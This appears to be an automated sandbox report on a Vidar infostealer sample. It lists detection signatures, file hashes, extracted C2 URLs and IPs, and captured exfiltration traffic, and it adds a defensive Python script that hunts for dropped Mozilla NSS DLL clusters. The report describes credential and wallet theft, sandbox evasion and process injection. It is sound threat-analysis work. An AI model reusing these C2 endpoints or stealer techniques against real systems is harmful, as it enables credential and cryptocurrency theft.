Windows Analysis Report
7ZthFNAqYp.exe

Overview

General Information

Sample name: 7ZthFNAqYp.exe
(renamed because the original name is a hash value)
Original sample name: 6733924c670207ed7755dc0fe2286c36.exe
Analysis ID: 1539807
MD5: 6733924c670207ed7755dc0fe2286c36
SHA1: 2fea9c1b0c3b0a923232dbcadcfc661bb08031d0
SHA256: a555018ed03a0b191f64f625b75cebd9f62c194c7b1c1a66b91266f2f1c1b6c4
Tags: 32, exe, trojan

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

AV Detection

Source: 7ZthFNAqYp.exe Avira: detected
Source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199786602107", "https://t.me/fun88rockskek"], "Botnet": "65158feadb3cebfa5c9a9e36f0d461fe"}
Source: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe ReversingLabs: Detection: 15%
Source: 7ZthFNAqYp.exe ReversingLabs: Detection: 44%
Source: 7ZthFNAqYp.exe Virustotal: Detection: 44%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_009280A1 CryptUnprotectData,LocalAlloc,LocalFree, 2_2_009280A1
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00928048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 2_2_00928048
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00931E32 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 2_2_00931E32
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092A7AD _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA, 2_2_0092A7AD
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB0A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 2_2_6CB0A9A0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB044C0 PK11_PubEncrypt, 2_2_6CB044C0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAD4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 2_2_6CAD4420
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB04440 PK11_PrivDecrypt, 2_2_6CB04440
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB525B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 2_2_6CB525B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAEE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 2_2_6CAEE6E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAE8670 PK11_ExportEncryptedPrivKeyInfo, 2_2_6CAE8670
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB0A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 2_2_6CB0A650
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB2A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 2_2_6CB2A730
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB30180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 2_2_6CB30180
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB043B0 PK11_PubEncryptPKCS1,PR_SetError, 2_2_6CB043B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB27C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 2_2_6CB27C00
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB2BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 2_2_6CB2BD30
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAE7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 2_2_6CAE7D60
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB29EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 2_2_6CB29EC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB03FF0 PK11_PrivDecryptPKCS1, 2_2_6CB03FF0

Compliance

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Unpacked PE file: 2.2.7ZthFNAqYp.exe.20020000.4.unpack
Source: 7ZthFNAqYp.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49940 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49988 version: TLS 1.2
Source: unknown HTTPS traffic detected: 95.217.220.103:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: freebl3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source: Binary string: freebl3.pdbp source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source: Binary string: nss3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: softokn3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
Source: Binary string: nss3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\dev\sw\hbautil\source\windows\bench32\Release\Bench32.exe.pdb source: 7ZthFNAqYp.exe, AttoConvertVideo.exe.0.dr
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00936013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00936013
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00929CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00929CF1
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0093547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_0093547D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0092D59B
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00921D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00921D80
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_0092B5B4
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00934D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 2_2_00934D08
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_0092BF22
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0092B914
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00935B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 2_2_00935B4D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 2_2_0092CD0C
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00935182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 2_2_00935182
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 2_2_009214AD
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 2_2_009214AD
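The PDB strings above (mozglue.pdb, freebl3.pdb, nss3.pdb, softokn3.pdb, sqlite3.pdb, vcruntime140/msvcp140) come from the dropped DLLs, which are unmodified Mozilla NSS and MSVC runtime builds that the stealer fetches so it can call PK11SDR_Decrypt against Firefox credential stores. The DLLs themselves will hash as known-good; what is abnormal is the cluster sitting together in a drop directory (the report names C:\ProgramData and a folder under the user's Music directory) next to an unknown executable. The following hunting script is an added example written for this report, not Joe Sandbox or Vidar code: it walks a root, flags any directory outside an assumed allow-list of legitimate NSS consumers that holds at least three of the NSS DLLs, and records the cluster files with their SHA-256 for triage. The allow-list fragments, the demo directory layout and the placeholder file contents are constructed.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# DLLs the sample fetched from its C2 and dropped (see the GET requests under Networking).
CLUSTER = {"sqlp.dll", "freebl3.dll", "mozglue.dll", "msvcp140.dll",
           "softokn3.dll", "vcruntime140.dll", "nss3.dll"}
# The NSS subset: these rarely sit together outside a Mozilla product install.
NSS_ONLY = {"freebl3.dll", "mozglue.dll", "softokn3.dll", "nss3.dll"}
# Path fragments of legitimate NSS consumers (assumed allow-list, extend per estate).
LEGIT_PARENTS = ("mozilla firefox", "thunderbird", "tor browser", "seamonkey")


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def hunt(root, min_nss: int = 3) -> list:
    """Walk root; report directories holding >= min_nss of the NSS DLLs outside the
    allow-list, with every cluster file present and its SHA-256 for triage."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        names = {f.lower(): f for f in files}          # lower-case -> on-disk name
        if len(NSS_ONLY & names.keys()) < min_nss:
            continue
        if any(p in dirpath.lower() for p in LEGIT_PARENTS):
            continue
        present = sorted(CLUSTER & names.keys())
        findings.append({
            "dir": dirpath,
            "cluster_files": present,
            "hashes": {f: sha256_of(Path(dirpath) / names[f]) for f in present},
        })
    return findings


def make_demo_tree() -> tuple:
    """Constructed fixture: a suspicious drop directory and a Firefox install that
    carries the same DLLs. Returns (root, suspicious_dir)."""
    root = tempfile.mkdtemp(prefix="vidar_hunt_")
    bad = os.path.join(root, "ProgramData", "AttoDesignerUpdater")
    good = os.path.join(root, "Program Files", "Mozilla Firefox")
    for d in (bad, good):
        os.makedirs(d)
        for n in ("freebl3.dll", "mozglue.dll", "nss3.dll", "softokn3.dll", "msvcp140.dll"):
            with open(os.path.join(d, n), "wb") as f:
                f.write(b"MZ" + n.encode())        # placeholder bytes, not real PE files
    return root, bad


if __name__ == "__main__":
    demo_root, _ = make_demo_tree()
    for finding in hunt(demo_root):
        print(finding["dir"], finding["cluster_files"])
```

On a live host, run hunt() over C:\ProgramData, %LOCALAPPDATA%, %APPDATA% and the user profile rather than the whole volume; the hashes of the flagged DLLs are expected to match public Mozilla/Microsoft builds, so the file to submit for analysis is whatever executable shares the directory with them.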

Networking

Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:49993 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.217.220.103:443 -> 192.168.2.6:49993
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.217.220.103:443 -> 192.168.2.6:49992
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199786602107
Source: Malware configuration extractor URLs: https://t.me/fun88rockskek
Source: global traffic HTTP traffic detected: GET /fun88rockskek HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 107.191.36.218 | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 23.192.247.89
Source: Joe Sandbox View IP Address: 149.154.167.99
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View ASN Name: HETZNER-ASDE
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49990 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49992 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49994 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49989 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49991 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49995 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50000 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50002 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50001 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50003 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49997 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49993 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50004 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50006 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50007 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50005 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50008 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50010 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50011 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50013 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50014 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50009 -> 95.217.220.103:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50012 -> 95.217.220.103:443
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 255 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 332 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 5461 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqlp.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 829 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGII | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
